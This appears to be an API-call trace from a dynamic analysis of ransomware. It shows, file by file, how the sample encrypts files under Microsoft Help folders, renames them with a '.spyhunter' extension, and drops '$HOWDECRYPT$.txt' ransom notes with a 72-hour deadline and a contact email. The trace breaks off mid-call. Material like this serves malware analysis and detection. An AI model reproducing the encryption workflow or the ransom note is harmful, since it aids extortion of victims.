RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.959] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e348*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e348*=0x30) returned 1 [0178.959] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\namedurls.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.960] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK") returned 75 [0178.960] StrStrW (lpFirst="NamedURLs.HxK", lpSrch=".txt") returned 0x0 [0178.960] GetProcessHeap () returned 0x2c0000 [0178.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.960] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e30c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e30c*=0x8c, lpOverlapped=0x0) returned 1 [0178.961] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.961] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x8c, lpNumberOfBytesWritten=0x57e30c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e30c*=0x8c, lpOverlapped=0x0) returned 1 [0178.961] GetProcessHeap () returned 0x2c0000 [0178.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.961] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.961] WriteFile (in: hFile=0x178, lpBuffer=0x57e34c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e30c, lpOverlapped=0x0 | out: lpBuffer=0x57e34c*, lpNumberOfBytesWritten=0x57e30c*=0x4, lpOverlapped=0x0) returned 1 [0178.961] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e30c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e30c*=0x30, lpOverlapped=0x0) returned 1 [0178.961] CloseHandle (hObject=0x178) returned 1 [0178.961] GetProcessHeap () returned 0x2c0000 [0178.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.961] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK.spyhunter") returned 85 [0178.962] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\namedurls.hxk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\namedurls.hxk.spyhunter")) returned 1 [0178.962] GetProcessHeap () returned 0x2c0000 [0178.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.962] GetProcessHeap () returned 0x2c0000 [0178.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.963] GetProcessHeap () returned 0x2c0000 [0178.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ce0 | out: hHeap=0x2c0000) returned 1 [0178.963] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e348 | out: pbBuffer=0x57e348) returned 1 [0178.963] GetProcessHeap () returned 0x2c0000 [0178.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.963] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e340*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e340*=0x30) returned 1 [0178.963] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\keywords.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.966] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK") returned 74 [0178.966] StrStrW (lpFirst="Keywords.HxK", lpSrch=".txt") returned 0x0 [0178.966] GetProcessHeap () returned 0x2c0000 [0178.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.966] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e304, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e304*=0x85, lpOverlapped=0x0) returned 1 [0178.967] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.967] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57e304, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e304*=0x85, lpOverlapped=0x0) returned 1 [0178.967] GetProcessHeap () returned 0x2c0000 [0178.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.967] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.968] WriteFile (in: hFile=0x178, lpBuffer=0x57e344*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e304, lpOverlapped=0x0 | out: lpBuffer=0x57e344*, lpNumberOfBytesWritten=0x57e304*=0x4, lpOverlapped=0x0) returned 1 [0178.968] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e304, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e304*=0x30, lpOverlapped=0x0) returned 1 [0178.968] CloseHandle (hObject=0x178) returned 1 [0178.968] GetProcessHeap () returned 0x2c0000 [0178.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.968] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK.spyhunter") returned 84 [0178.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\keywords.hxk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\keywords.hxk.spyhunter")) returned 1 [0178.969] GetProcessHeap () returned 0x2c0000 [0178.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.969] GetProcessHeap () returned 0x2c0000 [0178.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.969] GetProcessHeap () returned 0x2c0000 [0178.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66c00 | out: hHeap=0x2c0000) returned 1 [0178.969] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e348 | out: pbBuffer=0x57e348) returned 1 [0178.969] GetProcessHeap () returned 0x2c0000 [0178.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.969] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e340*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e340*=0x30) returned 1 [0178.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.970] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC") returned 68 [0178.970] StrStrW (lpFirst="Hx.HxC", lpSrch=".txt") returned 0x0 [0178.970] GetProcessHeap () returned 0x2c0000 [0178.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.970] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e304, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e304*=0x323, lpOverlapped=0x0) returned 1 [0179.034] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffcdd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.034] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x323, lpNumberOfBytesWritten=0x57e304, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e304*=0x323, lpOverlapped=0x0) returned 1 [0179.034] GetProcessHeap () returned 0x2c0000 [0179.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.035] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.035] WriteFile (in: hFile=0x178, lpBuffer=0x57e344*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e304, lpOverlapped=0x0 | out: lpBuffer=0x57e344*, lpNumberOfBytesWritten=0x57e304*=0x4, lpOverlapped=0x0) returned 1 [0179.035] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e304, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e304*=0x30, lpOverlapped=0x0) returned 1 [0179.035] CloseHandle (hObject=0x178) returned 1 [0179.035] GetProcessHeap () returned 0x2c0000 [0179.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.035] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC.spyhunter") returned 78 [0179.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxc.spyhunter")) returned 1 [0179.036] GetProcessHeap () returned 0x2c0000 [0179.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.036] GetProcessHeap () returned 0x2c0000 [0179.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.036] GetProcessHeap () returned 0x2c0000 [0179.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b610 | out: hHeap=0x2c0000) returned 1 [0179.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.037] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.037] WriteFile (in: hFile=0x178, lpBuffer=0x57e277*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e3a0, lpOverlapped=0x0 | out: lpBuffer=0x57e277*, lpNumberOfBytesWritten=0x57e3a0*=0x127, lpOverlapped=0x0) returned 1 [0179.038] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.039] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e3a0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e3a0*=0x2ac, lpOverlapped=0x0) returned 1 [0179.039] CloseHandle (hObject=0x178) returned 1 [0179.039] GetProcessHeap () returned 0x2c0000 [0179.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7fd60 | out: hHeap=0x2c0000) returned 1 [0179.039] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e340 | out: pbBuffer=0x57e340) returned 1 [0179.039] GetProcessHeap () returned 0x2c0000 [0179.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.039] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e338*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e338*=0x30) returned 1 [0179.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.040] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll") returned 77 [0179.040] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.040] GetProcessHeap () returned 0x2c0000 [0179.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.040] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e2fc*=0x2800, lpOverlapped=0x0) returned 1 [0179.086] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.086] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e2fc*=0x2800, lpOverlapped=0x0) returned 1 [0179.086] GetProcessHeap () returned 0x2c0000 [0179.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.086] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.086] WriteFile (in: hFile=0x178, lpBuffer=0x57e33c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2fc, lpOverlapped=0x0 | out: lpBuffer=0x57e33c*, lpNumberOfBytesWritten=0x57e2fc*=0x4, lpOverlapped=0x0) returned 1 [0179.130] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2fc*=0x30, lpOverlapped=0x0) returned 1 [0179.130] CloseHandle (hObject=0x178) returned 1 [0179.130] GetProcessHeap () returned 0x2c0000 [0179.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.130] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.spyhunter") returned 87 [0179.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll.spyhunter")) returned 1 [0179.132] GetProcessHeap () returned 0x2c0000 [0179.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.132] GetProcessHeap () returned 0x2c0000 [0179.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.132] GetProcessHeap () returned 0x2c0000 [0179.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee84b8 | out: hHeap=0x2c0000) returned 1 [0179.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.134] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.134] WriteFile (in: hFile=0x178, lpBuffer=0x57e26f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e398, lpOverlapped=0x0 | out: lpBuffer=0x57e26f*, lpNumberOfBytesWritten=0x57e398*=0x127, lpOverlapped=0x0) returned 1 [0179.134] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.134] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e398, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e398*=0x2ac, lpOverlapped=0x0) returned 1 [0179.135] CloseHandle (hObject=0x178) returned 1 [0179.135] GetProcessHeap () returned 0x2c0000 [0179.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7fa90 | out: hHeap=0x2c0000) returned 1 [0179.135] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e338 | out: pbBuffer=0x57e338) returned 1 [0179.135] GetProcessHeap () returned 0x2c0000 [0179.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.135] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e330*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e330*=0x30) returned 1 [0179.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.136] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll") returned 77 [0179.136] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.136] GetProcessHeap () returned 0x2c0000 [0179.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.136] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e2f4*=0x2800, lpOverlapped=0x0) returned 1 [0179.226] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.227] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e2f4*=0x2800, lpOverlapped=0x0) returned 1 [0179.227] GetProcessHeap () returned 0x2c0000 [0179.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.227] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.227] WriteFile (in: hFile=0x178, lpBuffer=0x57e334*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2f4, lpOverlapped=0x0 | out: lpBuffer=0x57e334*, lpNumberOfBytesWritten=0x57e2f4*=0x4, lpOverlapped=0x0) returned 1 [0179.321] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2f4*=0x30, lpOverlapped=0x0) returned 1 [0179.321] CloseHandle (hObject=0x178) returned 1 [0179.321] GetProcessHeap () returned 0x2c0000 [0179.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.321] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.spyhunter") returned 87 [0179.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll.spyhunter")) returned 1 [0179.322] GetProcessHeap () returned 0x2c0000 [0179.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.322] GetProcessHeap () returned 0x2c0000 [0179.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.323] GetProcessHeap () returned 0x2c0000 [0179.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8200 | out: hHeap=0x2c0000) returned 1 [0179.323] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.324] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.324] WriteFile (in: hFile=0x178, lpBuffer=0x57e267*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e390, lpOverlapped=0x0 | out: lpBuffer=0x57e267*, lpNumberOfBytesWritten=0x57e390*=0x127, lpOverlapped=0x0) returned 1 [0179.325] lstrlenA 